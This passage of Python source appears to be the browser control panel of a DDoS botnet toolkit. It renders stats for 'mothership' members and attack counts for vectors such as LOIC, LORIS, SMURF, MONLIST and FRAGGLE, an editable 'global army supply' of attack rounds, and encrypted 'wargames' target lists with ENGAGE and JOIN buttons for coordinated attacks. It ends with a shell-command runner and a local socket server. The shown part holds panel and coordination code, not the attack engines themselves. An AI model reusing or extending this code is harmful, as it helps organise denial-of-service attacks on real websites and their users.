  6927. grid_table += "<tr><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td><td align='center'>ERROR!</td></tr>"
  6928. grid_table += "</table><br>"
  6929. l = time.ctime(os.path.getmtime(self.grid_file)) # get last modified time
  6930. mother_table = "<center><u>MOTHERSHIP STATS:</u> (Last Update: <font color='green'>"+str(l)+"</font>)</center><br><table cellpadding='5' cellspacing='5' border='1'><tr><td><font color='green'>MEMBERS:</font></td><td align='right'><font color='green'>"+str(mothership_members)+"</font></td><td><font color='orange' size='4'>-</font></td><td align='right'><font color='orange' size='4'>"+str(unknown_members)+"</font></td><td><font color='white' size='4'>*</font></td><td align='right'><font color='white' size='4'>"+str(member_1)+"</font></td><td><font color='cyan' size='4'>**</font></td><td align='right'><font color='cyan' size='4'>"+str(member_2)+"</font></td><td><font color='blueviolet' size='4'>***</font></td><td align='right'><font color='blueviolet' size='4'>"+str(member_3)+"</font></td><td><font color='blue' size='4'>****</font></td><td align='right'><font color='blue' size='4'>"+str(member_4)+"</font></td><td><font color='red' size='4'>&#x25BC;</font></td><td align='right'><font color='red' size='4'>"+str(member_5)+"</font></td></tr></table><br><table cellpadding='5' cellspacing='5' border='1'><tr><td>MISSIONS:</td><td align='right'>"+str(mothership_missions)+"</td><td>ATTACKS:</td><td align='right'>"+str(mothership_attacks)+"</td><td>CHARGO (ACTIVE!):</td><td align='right'>"+str(mothership_chargo)+"</td><td>DORKING:</td><td align='right'>"+str(mothership_dorking)+"</td><td>TRANSF:</td><td align='right'>"+str(mothership_transferred)+"</td><td>MAX.CHARGO:</td><td align='right'>"+str(mothership_maxchargo)+"</td></tr></table><br><table cellpadding='5' cellspacing='5' border='1'><tr><td>LOIC:</td><td align='right'>"+str(mothership_loic)+"</td><td>LORIS:</td><td align='right'>"+str(mothership_loris)+"</td><td>UFOSYN:</td><td align='right'>"+str(mothership_ufosyn)+"</td><td>SPRAY:</td><td align='right'>"+str(mothership_spray)+"</td><td>SMURF:</td><td align='right'>"+str(mothership_smurf)+"</td></tr><tr><td>XMAS:</td><td align='right'>"+str(mothership_xmas)+"</td><td>NUKE:</td><td align='right'>"+str(mothership_nuke)+"</td><td>TACHYON:</td><td align='right'>"+str(mothership_tachyon)+"</td><td>MONLIST:</td><td align='right'>"+str(mothership_monlist)+"</td></tr><tr><td>FRAGGLE:</td><td align='right'>"+str(mothership_fraggle)+"</td><td>SNIPER:</td><td align='right'>"+str(mothership_sniper)+"</td><td>UFOACK:</td><td align='right'>"+str(mothership_ufoack)+"</td><td>UFORST:</td><td align='right'>"+str(mothership_uforst)+"</td></tr><tr><td>DROPER:</td><td align='right'>"+str(mothership_droper)+"</td><td>OVERLAP:</td><td align='right'>"+str(mothership_overlap)+"</td><td>PINGER:</td><td align='right'>"+str(mothership_pinger)+"</td><td>UFOUDP:</td><td align='right'>"+str(mothership_ufoudp)+"</td></tr></table><br><hr><br>"
  6931. f.write(mother_table)
  6932. f.write(grid_table)
  6933. f.write(end_mark)
  6934. f.close()
  6935. else: # not valid stream data
  6936. pass
  6937. if page == "/cmd_decrypt_grid_update":
  6938. if not os.path.exists('/tmp/out'):
  6939. open('/tmp/out', 'w').close()
  6940. with open('/tmp/out', 'r') as f:
  6941. self.pages["/cmd_decrypt_grid_update"] = "<pre>"+f.read()+"<pre>"
  6942. if page == "/cmd_decrypt_wargames":
  6943. self.pages["/cmd_decrypt_wargames"] = "<pre>Waiting for decrypting results...</pre>"
  6944. wargames_join_flag = False # anti-join flag for non decrypted wargames
  6945. try:
  6946. wargames_deckey = pGet["wargames_deckey"]
  6947. except:
  6948. wargames_deckey = ""
  6949. end_mark = "[Info] [AI] End of decryption."
  6950. if wargames_deckey is not "": # wargames decryption
  6951. nodec_text = "KEY?"
  6952. try: # read global army supply from configuration file (json)
  6953. with open(self.mothership_supplycfg_file) as data_file:
  6954. data = json.load(data_file)
  6955. except:
  6956. if os.path.exists(self.mothership_supplycfg_file) == True:
  6957. print('[Error] [AI] Cannot open: "core/json/supplycfg.json" -> [Aborting!]\n')
  6958. return
  6959. else: # generate default global army supply configuration file
  6960. print('[Info] [AI] Cannot found: "core/json/supplycfg.json" -> [Generating!]')
  6961. with open(self.mothership_supplycfg_file, "w") as f:
  6962. json.dump({"botnet": 1, "loic": 0, "loris": 0, "ufosyn": 0, "spray": 0, "smurf": 0, "xmas": 0, "nuke": 0, "tachyon": 0, "monlist": 0, "fraggle": 0, "sniper": 0, "ufoack": 0, "uforst": 0, "droper": 0, "overlap": 0, "pinger": 0, "ufoudp": 0}, f, indent=4)
  6963. with open(self.mothership_supplycfg_file) as data_file:
  6964. data = json.load(data_file)
  6965. self.supply_botnet = data["botnet"]
  6966. self.supply_loic = data["loic"]
  6967. self.supply_loris = data["loris"]
  6968. self.supply_ufosyn = data["ufosyn"]
  6969. self.supply_spray = data["spray"]
  6970. self.supply_smurf = data["smurf"]
  6971. self.supply_xmas = data["xmas"]
  6972. self.supply_nuke = data["nuke"]
  6973. self.supply_tachyon = data["tachyon"]
  6974. self.supply_monlist = data["monlist"]
  6975. self.supply_fraggle = data["fraggle"]
  6976. self.supply_sniper = data["sniper"]
  6977. self.supply_ufoack = data["ufoack"]
  6978. self.supply_uforst = data["uforst"]
  6979. self.supply_droper = data["droper"]
  6980. self.supply_overlap = data["overlap"]
  6981. self.supply_pinger = data["pinger"]
  6982. self.supply_ufoudp = data["ufoudp"]
  6983. f = open(self.wargames_file,"r")
  6984. ls = f.readlines()
  6985. f.close()
  6986. if ls:
  6987. wargames_autopanel = "<u>MASSIVE ACTION</u>:<br><br><table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><button title='Remove ALL: -CLOSED-' onclick=JobRemoveAll('"+str(wargames_deckey)+"')>-PURGE-</button></td><td align='center'><button style='background-color:cyan;height:50px;width:120px' title='Engage ALL: -ONGOING-' onclick=JobAddAll()>ENGAGE ALL!</button></td><td align='center'><button style='background-color:red;height:50px;width:120px' title='Cancel ALL: JOINED!' onclick=JobCancelAll()>PANIC!!!</button></td></tr></table><br><br>"
  6988. wargames_supply = "<u>GLOBAL ARMY SUPPLY (rounds)</u>:<br><br><table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'>BOTNET ("+str(self.total_botnet)+"):</td><td align='center'>LOIC:</td><td align='center'>LORIS:</td><td align='center'>UFOSYN:</td><td align='center'>SPRAY:</td><td align='center'>FRAGGLE:</td><td align='center'>SNIPER:</td><td align='center'>UFOACK:</td><td align='center'>UFORST:</td></tr><tr><td align='center'><input type='number' min='1' max='99999' required id='supply_botnet' value='"+str(self.supply_botnet)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_loic' value='"+str(self.supply_loic)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_loris' value='"+str(self.supply_loris)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_ufosyn' value='"+str(self.supply_ufosyn)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_spray' value='"+str(self.supply_spray)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_fraggle' value='"+str(self.supply_fraggle)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_sniper' value='"+str(self.supply_sniper)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_ufoack' value='"+str(self.supply_ufoack)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_uforst' value='"+str(self.supply_uforst)+"' style='text-align: center;' readonly></td></tr><tr><td align='center'>SMURF:</td><td align='center'>XMAS:</td><td align='center'>NUKE:</td><td align='center'>TACHYON:</td><td align='center'>MONLIST:</td><td align='center'>DROPER:</td><td align='center'>OVERLAP:</td><td align='center'>PINGER:</td><td align='center'>UFOUDP:</td></tr><tr><td align='center'><input type='number' min='0' max='99999' required id='supply_smurf' value='"+str(self.supply_smurf)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_xmas' value='"+str(self.supply_xmas)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_nuke' value='"+str(self.supply_nuke)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_tachyon' value='"+str(self.supply_tachyon)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_monlist' value='"+str(self.supply_monlist)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_droper' value='"+str(self.supply_droper)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_overlap' value='"+str(self.supply_overlap)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_pinger' value='"+str(self.supply_pinger)+"' style='text-align: center;' readonly></td><td align='center'><input type='number' min='0' max='99999' required id='supply_ufoudp' value='"+str(self.supply_ufoudp)+"' style='text-align: center;' readonly></td><td align='center'><button id='supply_edit' title='Edit global army supply...' value='EDIT' onclick=EditSupply()>EDIT</button></td></tr></table><br><br>"
  6989. else:
  6990. wargames_autopanel = ""
  6991. wargames_supply = ""
  6992. wargames_table = wargames_autopanel + wargames_supply +"<table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><a id='filter_creation' style='color:red;text-decoration:underline red;' onclick=javascript:JobFilter('creation','"+str(wargames_deckey)+"');>CREATION:</a></td><td align='center'><a id='filter_target' style='color:red;text-decoration:underline red;' onclick=javascript:JobFilter('target','"+str(wargames_deckey)+"')>TARGET:</a></td><td align='center'><a id='filter_estimated' style='color:red;text-decoration:underline red;' onclick=javascript:JobFilter('estimated','"+str(wargames_deckey)+"')>DATE:</a></td><td align='center'><u>ETA:</u></td><td align='center'><u>ACTION:</u></td><td align='center'><u>STATUS:</u></td></tr>"
  6993. f = open("/tmp/out", "w")
  6994. self.list_wargames_rev = reversed(self.list_wargames) # order by DESC
  6995. wargames_id = 1
  6996. for m in self.list_wargames_rev: # list = creation, target, estimated
  6997. if wargames_msg_sep in m:
  6998. m = m.split(wargames_msg_sep)
  6999. wargames_creation = m[0] # creation date
  7000. self.decrypt(wargames_deckey, wargames_creation)
  7001. if self.decryptedtext:
  7002. wargames_creation = self.decryptedtext
  7003. else:
  7004. wargames_creation = nodec_text
  7005. self.decryptedtext = "" # clean decryptedtext buffer
  7006. wargames_target = m[1] # target
  7007. wargames_target_joined = wargames_target
  7008. self.decrypt(wargames_deckey, wargames_target)
  7009. if self.decryptedtext:
  7010. wargames_target = self.decryptedtext
  7011. if wargames_target.startswith("www."):
  7012. wargames_target = wargames_target.replace("www.","")
  7013. else:
  7014. wargames_target = nodec_text
  7015. self.decryptedtext = "" # clean decryptedtext buffer
  7016. wargames_estimated = m[2] # estimated time
  7017. self.decrypt(wargames_deckey, wargames_estimated)
  7018. if self.decryptedtext:
  7019. wargames_estimated = self.decryptedtext
  7020. wargames_join_flag = True
  7021. else:
  7022. wargames_estimated = nodec_text
  7023. self.decryptedtext = "" # clean decryptedtext buffer
  7024. else:
  7025. wargames_target = "KEY?"
  7026. now = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  7027. now = strptime(now, "%d-%m-%Y %H:%M:%S")
  7028. try:
  7029. wargames_creation = strptime(wargames_creation, "%d-%m-%Y %H:%M:%S")
  7030. wargames_estimated = strptime(wargames_estimated, "%d-%m-%Y %H:%M:%S")
  7031. except: # discarding errors also on panel
  7032. wargames_creation = now
  7033. wargames_estimated = now
  7034. if wargames_target == "KEY?": # allow to discard unencrypted wargames
  7035. wargames_creation = now
  7036. wargames_estimated = now
  7037. if (now >= wargames_estimated) == False: # change flag color when time is out
  7038. time_now = time.mktime(now)
  7039. time_estimated = time.mktime(wargames_estimated)
  7040. wargames_eta = (time_estimated - time_now)
  7041. hours, rem = divmod(wargames_eta, 3600)
  7042. minutes, seconds = divmod(rem, 60)
  7043. if "!!!" in wargames_target_joined:
  7044. status = "JOINED!"
  7045. wargames_status = "<font color='cyan'>"+status+"</font>"
  7046. if wargames_join_flag == True:
  7047. wargames_join = "<button id="+str(wargames_id)+" title='Cancel this battle...' onclick=JobCancel('"+str(wargames_id)+"')>CANCEL</button>"
  7048. else:
  7049. wargames_join = "KEY?" # present but with a different crypto-key
  7050. wargames_eta = "<font color='cyan'>{:0>2}h {:0>2}m {:02}s</font>".format(int(hours),int(minutes),int(seconds))
  7051. wargames_estimated = strftime("%d-%m-%Y %H:%M:%S", wargames_estimated)
  7052. time_flag = "<font color='cyan'>"+str(wargames_estimated)+"</font>"
  7053. wargames_creation = strftime("%d-%m-%Y %H:%M:%S", wargames_creation)
  7054. creation_flag = "<font color='cyan'>"+str(wargames_creation)+"</font>"
  7055. else:
  7056. status = "-ONGOING-"
  7057. wargames_status = "<font color='orange'>"+status+"</font>"
  7058. if wargames_join_flag == True:
  7059. wargames_join = "<button id="+str(wargames_id)+" title='Join this battle...' onclick=JobAdd('"+str(wargames_id)+"')>ENGAGE!</button>"
  7060. else:
  7061. wargames_join = "KEY?" # present but with a different crypto-key
  7062. wargames_eta = "<font color='orange'>{:0>2}h {:0>2}m {:02}s</font>".format(int(hours),int(minutes),int(seconds))
  7063. wargames_estimated = strftime("%d-%m-%Y %H:%M:%S", wargames_estimated)
  7064. time_flag = "<font color='orange'>"+str(wargames_estimated)+"</font>"
  7065. wargames_creation = strftime("%d-%m-%Y %H:%M:%S", wargames_creation)
  7066. creation_flag = "<font color='orange'>"+str(wargames_creation)+"</font>"
  7067. else:
  7068. wargames_estimated = strftime("%d-%m-%Y %H:%M:%S", wargames_estimated)
  7069. time_flag = "<font color='red'><s>"+str(wargames_estimated)+"</s></font>"
  7070. wargames_creation = strftime("%d-%m-%Y %H:%M:%S", wargames_creation)
  7071. creation_flag = "<font color='red'>"+str(wargames_creation)+"</font>"
  7072. wargames_join = "<button id="+str(wargames_id)+" title='Remove this battle...' onclick=JobRemove('"+str(wargames_id)+"')>REMOVE</button>"
  7073. wargames_eta = "<font color='red'>OUT-OF-TIME</font>"
  7074. status = "-CLOSED-"
  7075. wargames_status = "<font color='red'>"+status+"</font>"
  7076. wargames_table += "<tr><td align='center'>"+creation_flag+"</td><td align='center'><a href='http://"+str(wargames_target)+"' target='_blank'>"+str(wargames_target)+"</a></td><td align='center'>"+time_flag+"</td><td align='center'>"+wargames_eta+"</td><td align='center'>"+wargames_join+"</td><td align='center'>"+wargames_status+"</td></tr>"
  7077. wargames_id = wargames_id + 1
  7078. wargames_table += "</table><br>"
  7079. f.write(wargames_table)
  7080. f.write(end_mark)
  7081. f.close()
  7082. if page == "/cmd_decrypt_wargames_update":
  7083. if not os.path.exists('/tmp/out'):
  7084. open('/tmp/out', 'w').close()
  7085. with open('/tmp/out', 'r') as f:
  7086. self.pages["/cmd_decrypt_wargames_update"] = "<pre>"+f.read()+"<pre>"
  7087. if page == "/cmd_decrypt_links":
  7088. self.pages["/cmd_decrypt_links"] = "<pre>Waiting for decrypting results...</pre>"
  7089. try:
  7090. link_deckey = pGet["link_deckey"]
  7091. except:
  7092. link_deckey = ""
  7093. end_mark = "[Info] [AI] End of decryption."
  7094. if link_deckey is not "": # links decryption
  7095. nodec_text = "KEY?"
  7096. links_table = "<table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><a id='filter_creation' style='color:red;text-decoration:underline red;' onclick=javascript:LinkFilter('creation','"+str(link_deckey)+"');>CREATION:</a></td><td align='center'><a id='filter_topic' style='color:red;text-decoration:underline red;' onclick=javascript:LinkFilter('topic','"+str(link_deckey)+"')>TOPIC:</a></td><td align='center'><a id='filter_url' style='color:red;text-decoration:underline red;' onclick=javascript:LinkFilter('url','"+str(link_deckey)+"')>URL:</a></td></tr>"
  7097. f = open("/tmp/out", "w")
  7098. self.list_links_rev = reversed(self.list_links) # order by DESC
  7099. for m in self.list_links_rev: # list = creation, topic, url
  7100. if links_msg_sep in m:
  7101. m = m.split(links_msg_sep)
  7102. link_creation = m[0] # creation date
  7103. self.decrypt(link_deckey, link_creation)
  7104. if self.decryptedtext:
  7105. link_creation = self.decryptedtext
  7106. else:
  7107. link_creation = nodec_text
  7108. self.decryptedtext = "" # clean decryptedtext buffer
  7109. link_url = m[1] # url
  7110. self.decrypt(link_deckey, link_url)
  7111. if self.decryptedtext:
  7112. link_url = self.decryptedtext
  7113. if link_url.startswith("www."):
  7114. link_url = link_url.replace("www.","")
  7115. else:
  7116. link_url = nodec_text
  7117. self.decryptedtext = "" # clean decryptedtext buffer
  7118. link_topic = m[2] # topic
  7119. self.decrypt(link_deckey, link_topic)
  7120. if self.decryptedtext:
  7121. link_topic = self.decryptedtext
  7122. else:
  7123. link_topic = nodec_text
  7124. self.decryptedtext = "" # clean decryptedtext buffer
  7125. else:
  7126. link_url = "KEY?"
  7127. links_table += "<tr><td align='center'>"+link_creation+"</td><td align='center'>"+link_topic+"</td><td align='center'><a href='"+str(link_url)+"' target='_blank'>"+str(link_url)+"</a></td></tr>"
  7128. links_table += "</table><br>"
  7129. f.write(links_table)
  7130. f.write(end_mark)
  7131. f.close()
  7132. if page == "/cmd_decrypt_links_update":
  7133. if not os.path.exists('/tmp/out'):
  7134. open('/tmp/out', 'w').close()
  7135. with open('/tmp/out', 'r') as f:
  7136. self.pages["/cmd_decrypt_links_update"] = "<pre>"+f.read()+"<pre>"
  7137. if page == "/cmd_decrypt_streams":
  7138. self.pages["/cmd_decrypt_streams"] = "<pre>Waiting for decrypting results...</pre>"
  7139. try:
  7140. stream_deckey = pGet["stream_deckey"]
  7141. except:
  7142. stream_deckey = ""
  7143. end_mark = "[Info] [AI] End of decryption."
  7144. if stream_deckey is not "": # streams decryption
  7145. nodec_text = "KEY?"
  7146. streams_table = "<table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><a id='filter_creation' style='color:red;text-decoration:underline red;' onclick=javascript:StreamFilter('creation','"+str(stream_deckey)+"');>CREATION:</a></td><td align='center'><a id='filter_topic' style='color:red;text-decoration:underline red;' onclick=javascript:StreamFilter('topic','"+str(stream_deckey)+"')>TOPIC:</a></td><td align='center'><a id='filter_url' style='color:red;text-decoration:underline red;' onclick=javascript:StreamFilter('url','"+str(stream_deckey)+"')>STREAM:</a></td><td align='center'>VIDEO:</td></tr>"
  7147. f = open("/tmp/out", "w")
  7148. self.list_streams_rev = reversed(self.list_streams) # order by DESC
  7149. for m in self.list_streams_rev: # list = creation, topic, url
  7150. if streams_msg_sep in m:
  7151. m = m.split(streams_msg_sep)
  7152. stream_creation = m[0] # creation date
  7153. self.decrypt(stream_deckey, stream_creation)
  7154. if self.decryptedtext:
  7155. stream_creation = self.decryptedtext
  7156. else:
  7157. stream_creation = nodec_text
  7158. self.decryptedtext = "" # clean decryptedtext buffer
  7159. stream_url = m[1] # url
  7160. self.decrypt(stream_deckey, stream_url)
  7161. if self.decryptedtext:
  7162. stream_url = self.decryptedtext
  7163. if stream_url.startswith("www."):
  7164. stream_url = stream_url.replace("www.","")
  7165. else:
  7166. stream_url = nodec_text
  7167. self.decryptedtext = "" # clean decryptedtext buffer
  7168. stream_topic = m[2] # topic
  7169. self.decrypt(stream_deckey, stream_topic)
  7170. if self.decryptedtext:
  7171. stream_topic = self.decryptedtext
  7172. else:
  7173. stream_topic = nodec_text
  7174. self.decryptedtext = "" # clean decryptedtext buffer
  7175. stream_id = str(stream_url.split("v=")[1]) # extract (Youtube) VideoID
  7176. else:
  7177. stream_url = "KEY?"
  7178. stream_id = None
  7179. streams_table += "<tr><td align='center'>"+stream_creation+"</td><td align='center'>"+stream_topic+"</td><td align='center'><a href='"+str(stream_url)+"' target='_blank'>"+str(stream_url)+"</a></td><td align='center'><button id='play_button' value='"+stream_id+"' onclick='PlayStream();return false;'>PLAY!</button><div id='video'></div></td></tr>"
  7180. streams_table += "</table><br>"
  7181. f.write(streams_table)
  7182. f.write(end_mark)
  7183. f.close()
  7184. if page == "/cmd_decrypt_streams_update":
  7185. if not os.path.exists('/tmp/out'):
  7186. open('/tmp/out', 'w').close()
  7187. with open('/tmp/out', 'r') as f:
  7188. self.pages["/cmd_decrypt_streams_update"] = "<pre>"+f.read()+"<pre>"
  7189. if page == "/cmd_decrypt_globalnet":
  7190. self.pages["/cmd_decrypt_globalnet"] = "<pre>Waiting for decrypting results...</pre>"
  7191. try:
  7192. globalnet_deckey = pGet["globalnet_deckey"]
  7193. except:
  7194. globalnet_deckey = ""
  7195. end_mark = "[Info] [AI] End of decryption."
  7196. if globalnet_deckey is not "": # globalnet decryption
  7197. nodec_text = "KEY?"
  7198. globalnet_table = "<table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><a id='filter_owner' style='color:red;text-decoration:underline red;' onclick=javascript:GlobalnetFilter('owner','"+str(globalnet_deckey)+"');>OWNER:</a></td><td align='center'><a id='filter_comment' style='color:red;text-decoration:underline red;' onclick=javascript:GlobalnetFilter('comment','"+str(globalnet_deckey)+"')>COMMENT:</a></td><td align='center'><a id='filter_warp' style='color:red;text-decoration:underline red;' onclick=javascript:GlobalnetFilter('warp','"+str(globalnet_deckey)+"')>WARPING:</a></td><td align='center'><a id='filter_ip' style='color:red;text-decoration:underline red;' onclick=javascript:GlobalnetFilter('ip','"+str(globalnet_deckey)+"')>IP:</a></td></tr>"
  7199. f = open("/tmp/out", "w")
  7200. self.list_globalnet_rev = reversed(self.list_globalnet) # order by DESC
  7201. for m in self.list_globalnet_rev: # list = owner, comment, warping, ip
  7202. if globalnet_msg_sep in m:
  7203. m = m.split(globalnet_msg_sep)
  7204. globalnet_owner = m[0] # owner
  7205. self.decrypt(globalnet_deckey, globalnet_owner)
  7206. if self.decryptedtext:
  7207. globalnet_owner = self.decryptedtext
  7208. else:
  7209. globalnet_owner = nodec_text
  7210. self.decryptedtext = "" # clean decryptedtext buffer
  7211. globalnet_comment = m[1] # comment
  7212. self.decrypt(globalnet_deckey, globalnet_comment)
  7213. if self.decryptedtext:
  7214. globalnet_comment = self.decryptedtext
  7215. else:
  7216. globalnet_comment = nodec_text
  7217. self.decryptedtext = "" # clean decryptedtext buffer
  7218. globalnet_warp = m[2] # warp
  7219. self.decrypt(globalnet_deckey, globalnet_warp)
  7220. if self.decryptedtext:
  7221. globalnet_warp = self.decryptedtext
  7222. else:
  7223. globalnet_warp = nodec_text
  7224. if globalnet_warp == "OFF":
  7225. warp_color = "pink"
  7226. elif globalnet_warp == "ON1":
  7227. warp_color = "orange"
  7228. else: # ON2
  7229. warp_color = "blue"
  7230. self.decryptedtext = "" # clean decryptedtext buffer
  7231. globalnet_ip = m[3] # ip
  7232. self.decrypt(globalnet_deckey, globalnet_ip)
  7233. if self.decryptedtext:
  7234. globalnet_ip = self.decryptedtext
  7235. else:
  7236. globalnet_ip = nodec_text
  7237. self.decryptedtext = "" # clean decryptedtext buffer
  7238. else:
  7239. globalnet_owner = "KEY?"
  7240. globalnet_comment = "KEY?"
  7241. globalnet_table += "<tr><td align='center'>"+str(globalnet_owner)+"</td><td align='center'>"+str(globalnet_comment)+"</td><td align='center'><font color="+warp_color+">"+str(globalnet_warp)+"</font></td><td align='center'><font color="+warp_color+">"+str(globalnet_ip)+"</font></td></tr>"
  7242. globalnet_table += "</table><br>"
  7243. f.write(globalnet_table)
  7244. f.write(end_mark)
  7245. f.close()
  7246. if page == "/cmd_decrypt_globalnet_update":
  7247. if not os.path.exists('/tmp/out'):
  7248. open('/tmp/out', 'w').close()
  7249. with open('/tmp/out', 'r') as f:
  7250. self.pages["/cmd_decrypt_globalnet_update"] = "<pre>"+f.read()+"<pre>"
  7251. if page == "/blackholes":
  7252. self.pages["/blackholes"] = self.html_blackholes()
  7253. if page == "/requests":
  7254. if pGet=={}:
  7255. self.pages["/requests"] = self.html_requests()
  7256. else:
  7257. self.save_cfg(pGet)
  7258. self.pages["/requests"] = self.html_request_submit()
  7259. if page == "/abduction":
  7260. self.pages["/abduction"] = self.html_abduction()
  7261. if page == "/stats":
  7262. self.pages["/stats"] = self.html_stats()
  7263. if page == "/wormhole":
  7264. self.pages["/wormhole"] = self.pages["/header"] + "<iframe height='100%' width='100%' src='https://webchat.freenode.net'>"
  7265. ctype = "text/html"
  7266. if page.find(".js") != -1:
  7267. ctype = "application/javascript"
  7268. elif page.find(".txt") != -1:
  7269. ctype = "text/plain"
  7270. elif page.find(".ico") != -1:
  7271. ctype = "image/x-icon"
  7272. elif page.find(".png") != -1:
  7273. ctype = "image/png"
  7274. elif page.find(".css") != -1:
  7275. ctype = "text/css"
  7276. if page in self.pages:
  7277. return dict(run=runcmd, code="200 OK", html=self.pages[page], ctype=ctype)
  7278. return dict(run=runcmd, code="404 Error", html="404 Error<br><br>Page not found...", ctype=ctype)
  7279. class Command(object):
  7280. def __init__(self, cmd):
  7281. self.cmd = cmd
  7282. self.process = None
  7283. def run(self, timeout):
  7284. def target():
  7285. self.process = subprocess.Popen(self.cmd, shell=True)
  7286. thread = threading.Thread(target=target)
  7287. thread.start()
  7288. thread.join(timeout)
  7289. if thread.is_alive():
  7290. self.process.terminate()
  7291. thread.join()
  7292. if __name__ == "__main__":
  7293. webbrowser.open('http://127.0.0.1:9999', new=1)
  7294. tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  7295. tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  7296. tcpsock.bind((host, port))
  7297. while True:
  7298. tcpsock.listen(4)
  7299. (clientsock, (ip, c_port)) = tcpsock.accept()
  7300. newthread = ClientThread(ip, c_port, clientsock)
  7301. newthread.start()